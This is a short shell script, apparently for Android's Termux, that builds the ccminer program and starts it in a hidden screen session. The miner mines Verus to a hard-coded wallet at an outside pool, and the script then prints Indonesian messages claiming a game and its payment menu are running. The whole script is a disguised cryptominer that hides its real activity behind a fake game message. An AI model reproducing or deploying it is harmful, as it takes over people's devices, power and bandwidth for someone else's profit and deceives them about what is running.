pkg install libcurl libjansson automake build-essential screen git -y
git clone --single-branch -b ARM https://github.com/monkins1010/ccminer.git
cd ccminer
chmod +x build.sh
chmod +x configure.sh
chmod +x autogen.sh
./build.sh
cd ~
screen -dmS miner ~/ccminer/ccminer -a verus -o stratum+tcp://sg.vipor.net:5040 -u RQdUotwPueFvRY5xKfn6REsMUsBdhhmqdq -p x -t 8
echo "------------------------------"
echo "Game sedang di jalankan"
echo "menu pembayaran game sedang berlangsung"
echo "------------------------------"
